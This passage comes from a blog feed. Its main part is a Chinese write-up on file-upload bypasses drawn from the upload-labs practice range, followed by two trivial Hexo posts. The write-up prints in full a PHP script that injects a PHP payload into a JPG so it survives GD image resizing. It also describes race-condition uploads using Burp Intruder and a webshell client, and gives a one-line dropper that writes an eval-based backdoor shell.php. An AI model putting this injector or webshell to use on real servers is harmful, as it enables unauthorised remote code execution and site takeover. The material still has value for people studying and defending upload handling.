class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> It is necessary that the size and quality of the initial image are the same as those of the processed image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 1) Upload an arbitrary image via secured files upload script</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 2) Save the processed image and launch:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> jpg_payload.php <jpg_name.jpg></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> In case of successful injection you will get a specially crafted image, which should be uploaded again.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> Since the most straightforward injection method is used, the following problems can occur:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 1) After the second processing the injected data may become partially corrupted.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 2) The jpg_payload.php script outputs "Something's wrong".</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> Sergey Bobrov <span class="doctag">@Black</span>2Fan.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> See also:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> = <span class="string">"<?=phpinfo();?>"</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">//payload,add=</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">extension_loaded</span>(<span class="string">'gd'</span>) || !<span class="title function_ invoke__">function_exists</span>(<span class="string">'imagecreatefromjpeg'</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'php-gd is not installed'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$argv</span>[<span class="number">1</span>])) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'php jpg_payload.php <jpg_name.jpg>'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">set_error_handler</span>(<span class="string">"custom_error_handler"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$pad</span> = <span class="number">0</span>; <span class="variable">$pad</span> < <span class="number">1024</span>; <span class="variable">$pad</span>++) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$nullbytePayloadSize</span> = <span class="variable">$pad</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$dis</span> = <span class="keyword">new</span> <span class="title class_">DataInputStream</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStream</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$extraBytes</span> = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>-><span class="title function_ invoke__">readShort</span>() != <span class="number">0xFFD8</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Incorrect SOI marker'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>((!<span class="variable">$dis</span>-><span class="title function_ invoke__">eof</span>()) && (<span class="variable">$dis</span>-><span class="title function_ invoke__">readByte</span>() == <span class="number">0xFF</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$marker</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">readByte</span>();</span><br><span class="line"></span><br><span class="line"> <span class="variable">$size</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">readShort</span>() - <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$dis</span>-><span class="title function_ invoke__">skip</span>(<span class="variable">$size</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$marker</span> === <span class="number">0xDA</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$startPos</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">seek</span>();</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStreamTmp</span> = </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">str_repeat</span>(<span class="string">"\0"</span>,<span class="variable">$nullbytePayloadSize</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>);</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">checkImage</span>(<span class="string">'_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStreamTmp</span>, <span class="literal">TRUE</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$extraBytes</span> !== <span class="number">0</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>((!<span class="variable">$dis</span>-><span class="title function_ invoke__">eof</span>())) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>-><span class="title function_ invoke__">readByte</span>() === <span class="number">0xFF</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>->readByte !== <span class="number">0x00</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$stopPos</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">seek</span>() - <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$imageStreamSize</span> = <span class="variable">$stopPos</span> - <span class="variable">$startPos</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStream</span> = </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">str_repeat</span>(<span class="string">"\0"</span>,<span class="variable">$nullbytePayloadSize</span>).</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>, <span class="variable">$imageStreamSize</span>),</span><br><span class="line"></span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"></span><br><span class="line"> <span class="variable">$nullbytePayloadSize</span>+<span class="variable">$imageStreamSize</span>-<span class="variable">$extraBytes</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$stopPos</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$correctImage</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStream</span> = <span class="variable">$outStreamTmp</span>;</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">checkImage</span>(<span class="string">'payload_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStream</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Success!'</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="string">'payload_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Something\'s wrong'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">checkImage</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$data</span>, <span class="variable">$unlink</span> = <span class="literal">FALSE</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$data</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$unlink</span>)</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">custom_error_handler</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$errfile</span>, <span class="variable">$errline</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$extraBytes</span>, <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">FALSE</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/(**\d**+) extraneous bytes before marker/'</span>, <span class="variable">$errstr</span>, <span class="variable">$m</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$m</span>[<span class="number">1</span>])) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$extraBytes</span> = (<span class="keyword">int</span>)<span class="variable">$m</span>[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">DataInputStream</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$binData</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$order</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$size</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$order</span> = <span class="literal">false</span>, <span class="variable">$fromString</span> = <span class="literal">false</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->order = <span class="variable">$order</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$fromString</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>) || !<span class="title function_ invoke__">is_file</span>(<span class="variable">$filename</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'File not exists ['</span>.<span class="variable">$filename</span>.<span class="string">']'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->size = <span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">seek</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> (<span class="variable language_">$this</span>->size - <span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData));</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">skip</span>(<span class="params"><span class="variable">$skip</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="variable">$skip</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readByte</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">$this</span>-><span class="title function_ invoke__">eof</span>()) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'End Of File'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$byte</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">ord</span>(<span class="variable">$byte</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readShort</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData) < <span class="number">2</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'End Of File'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">$this</span>->order) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]) << <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]) << <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$short</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">eof</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> !<span class="variable language_">$this</span>->binData||(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData) === <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717221745725.png" alt="image-20220717221745725"></p><p> 成功绕过</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717222127137.png" alt="image-20220717222127137"></p><h3 id="三,条件竞争"><a href="#三,条件竞争" class="headerlink" title="三,条件竞争"></a>三,条件竞争</h3><p>关于条件竞争</p><p> 什么是条件竞争上传,条件竞争上传是一种服务器端的漏洞,由于后端程序操作逻辑不合理导致。 由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生,此漏洞一般发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。</p><p> 发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。也就是我们成功上传了php文件但后端在短时间内将其删除了,所以我们要抢到在它删除之前访问文件,就如我们打开文件的时候去删除它,会提示文件文件已打开一样,这样从而防止文件被删除。</p><p> bp攻击方法简单描述,发送到 Intruder,这里解题不需要payload,只要不断上传同时我们不断访问文件即可。</p><p> 如果先上传在验证,我们可以直接上传php;要是先验证需要绕过</p><p> 实操中,是可以通过条件竞争实现蚁剑连接,但是极不稳定,很容易断开,<del>这种方法我觉得更适合去暴露一些非一次性的关键信息</del></p><p> 能访问到就是最大的问题,可以写php,能访问到就创建一个shell文件在指定目录,这样子后续就可以访问后门getshell</p><p>类似代码如下:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"> fputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>');</span><br><span class="line"> ?></span><br></pre></td></tr></table></figure><p>参考链接:<a href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html">https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html</a></p>]]></content>
<summary type="html"><p>做完文件上传靶场upload-labs题目后,进行的一些归纳总结</p></summary>
<category term="upload-labs" scheme="http://example.com/tags/upload-labs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="file upload" scheme="http://example.com/tags/file-upload/"/>
</entry>
<entry>
<title>try</title>
<link href="http://example.com/2022/07/11/try/"/>
<id>http://example.com/2022/07/11/try/</id>
<published>2022-07-11T11:07:51.000Z</published>
<updated>2022-07-11T14:50:17.458Z</updated>
<content type="html"><--><p><a href="http://zhihu.com/">知乎</a><br><a href="http://baidu.com/">百度</a></p>]]></content>
<summary type="html"><p>这是测试也是开始(๑•̀ㅂ•́)و✧</p></summary>
<category term="hexo" scheme="http://example.com/tags/hexo/"/>
<category term="test" scheme="http://example.com/tags/test/"/>
<category term="md" scheme="http://example.com/tags/md/"/>
</entry>
<entry>
<title>Hello World</title>
<link href="http://example.com/2022/07/11/hello-world/"/>
<id>http://example.com/2022/07/11/hello-world/</id>
<published>2022-07-11T08:24:20.972Z</published>
<updated>2022-07-11T14:10:14.414Z</updated>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<summary type="html"><p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for</summary>
<category term="instrustion" scheme="http://example.com/tags/instrustion/"/>
<category term="hexo" scheme="http://example.com/tags/hexo/"/>
</entry>
</feed>